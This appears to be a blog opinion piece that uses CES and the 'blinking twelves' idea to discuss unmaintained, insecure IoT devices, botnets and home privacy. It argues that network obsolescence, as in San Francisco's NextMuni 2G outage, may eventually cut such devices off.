Security is important - but let’s focus on getting the basics right, without getting distracted by overly-specific cybersecurity fantasy role-playing game scenarios involving Jason Bourne hacking your Alexa to steal your secrets.

IoT Future: Saved by Obsolescence?

It’s that most magical time of year… no, not Christmas, that’s all over now until next December. No, I mean CES, the annual Consumer Electronics Show in Las Vegas. Where better than Vegas for a million ridiculous dreams to enjoy brief moments of fame, only to fade soon after?

It used to be that the worst thing that could come out of CES was a drawer full of obsolete gadgets. These days, things can get a bit more serious. Pretty much every gadget on display is now wifi-enabled and internet-connected - yes, even the pillows and hairbrushes.

The reason this proliferation of connectivity is a problem is the "blinking twelves" factor, that I have written about before:

Back in the last century, digital clocks with seven-segment displays became ubiquitous, including as part of other items of home electronics such as VCRs. When first plugged in, these would blink "12:00" until the time was set by the user.

Technically-minded people soon noticed that when they visited less technical friends or relatives, all the appliances in the house would still be blinking "12:00" instead of the correct time. The "blinking twelves" rapidly became short-hand for "civilians" not being able to – or not caring to – keep up with the demands of ubiquitous technology.

The problem that we are facing is that computing has begun to spread beyond the desktop. Even the most technophobic now carry a phone that is "smart" to a greater or lesser degree, and many people treat these devices much like their old VCRs, installing them once and then forgetting about them. However, all of these devices are running 24/7, connected to the public Internet, with little to no management or updates.

Now we are starting to see the impact of that situation. Earlier this year, one of the biggest botnets in history was created from hacked smart CCTV cameras and took down big chunks of the Internet.

That’s just crude weight-of-numbers stuff, though; the situation will get even more… interesting as people figure out how to use all of the data gathered by those Things - and not just the owners of the devices, either. As people introduce always-on internet-connected microphones into their homes, it’s legitimate for police to wonder what evidence those microphones may have overheard. It is no longer totally paranoid to wonder what the eventual impact will be:

Remember that quaint old phrase "in the privacy of your own home". I wonder how often we will be using it in 20 years' time.

What can we do?

Previous scares have shown that there is little point in the digerati getting all excited about these sorts of things. People have enough going on with their lives; it takes laws to force drivers to take care of basic maintenance of their cars, and we are talking about multi-tonne hunks of metal capable of speeds in excess of 100mph. Forget about getting them to update firmware on every single device in their home, several times a year.

Calls for legislation of IoT are in my opinion misguided; previous attempts to apply static legal frameworks to the dynamic environment of the Internet have tended to be ineffective at best, and to backfire at worst.

Ultimately, what will save us is that same blinking twelves nature of consumers. There is a situation right now in San Francisco, where the local public transport system’s display units that should show the time until the next bus or train are giving wildly inaccurate times:

To blame is a glitch that's rendered as many as 40 percent of buses and Muni vehicles "invisible" to the NextMuni system: A bus or light rail train could arrive far sooner than indicated, but the problem, which emerged this week, is not expected to be resolved for several weeks.

Muni management have explained the problem (emphasis mine):

NextMuni data is transmitted via AT&T’s wireless cell phone network. As Muni was the first transit agency to adopt the system, the NextMuni infrastructure installed in 2002 only had the capacity to use a 2G wireless network – a now outdated technology which AT&T is deactivating nationwide.

What took down NextMuni - the obsolescence of the 2G network that it relied on - will also be the fix for all the obsolete and insecure IoT devices out there, next time there is a major upgrade in wifi standards. More expert users may proactively upgrade their wifi access points to get better speed and range, but that will not catch most of the blinking twelves people. However, it’s probably safe to assume that most of the Muggles are relying on devices from their internet provider, and when their provider sends them a new device or they change provider, hey presto - all the insecure Things get disconnected from their botnets.

Problem solved?


Image by Arto Marttinen via Unsplash